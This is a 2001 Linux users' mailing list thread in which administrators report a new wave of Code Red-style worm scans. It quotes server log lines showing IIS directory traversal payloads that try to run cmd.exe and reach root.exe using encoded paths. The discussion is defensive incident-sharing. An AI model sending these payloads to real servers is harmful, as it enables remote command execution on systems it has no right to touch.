[ale] CodeRed attacks, here we go again.

Shawn Veader veader at mail.com
Tue Sep 18 11:32:13 EDT 2001 

I would agree. I posted this about a month back but it shows
a calendar with hits per day and you can see that it has 
definitely spiked in the last two days....

http://www.veader.org/codeRedStats.html
(or if Telocity still hasn't gotten their DNS straight.... <grr>)
http://veader.die.ms/codeRedStats.html
--
shawn veader


On Tuesday 18 September 2001 10:28 am, you wrote:
> Ditto here.  400 hits in 2 hours.  Looks like another Code Red
> Variant......
>
> Mike
>
> -----Original Message-----
> From: Terry Lee Tucker [mailto:terry at esc1.com]
> Sent: Tuesday, September 18, 2001 10:24 AM
> To: SAngell at nan.net; ale at ale.org
> Subject: Re: [ale] CodeRed attacks, here we go again.
>
>
> I'm getting hit with the following:
>
> 208.5.209.246 - - [18/Sep/2001:10:30:26 -0400] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 283
> 208.5.209.246 - - [18/Sep/2001:10:30:27 -0400] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
> 208.5.209.246 - - [18/Sep/2001:10:30:28 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
> 208.5.209.246 - - [18/Sep/2001:10:30:30 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
> 208.5.209.246 - - [18/Sep/2001:10:30:31 -0400] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 208.5.209.246 - - [18/Sep/2001:10:30:36 -0400] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322
> 208.5.209.246 - - [18/Sep/2001:10:30:37 -0400] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322
> 208.5.209.246 - - [18/Sep/2001:10:30:39 -0400] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
>y stem32/cmd.exe?/c+dir
> HTTP/1.0"
> 404 338
> 208.5.209.246 - - [18/Sep/2001:10:30:40 -0400] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
> 208.5.209.246 - - [18/Sep/2001:10:30:41 -0400] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
>
> Obviously, someone is trying to get something from a windoze box.
>
> SAngell at nan.net wrote:
> > I am being flooded by Code Red attacks originating from network
>
> 205.152.x.x all
>
> > by the variant which is attempting to drop the trojan backdoor on to my
>
> servers.
>
> > either root.exe or explorer.exe. This attack is worse that any I have
>
> previously
>
> > seen with hundreds of attempts in the last 5 minutes.
> >
> > Anyone else witnessing these?
> >
> > \_\_\_\_\_\_\_\_\_\_\_/_/_/_/_/_/_/_/_/_/_/
> > \_    Steve Angell,  MCSE, CCNA           _/
> > \_    MIS Operations Manager               _/
> > \_    TSYS Total Debt Management  _/
> > \_    Norcross, GA                                   _/
> > \_    Phone 770-409-5570                    _/
> > \_    Fax      770-416-1752                   _/
> > \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
> >
> > --
> > To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message
>
> body.
--
To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.

More information about the Ale mailing list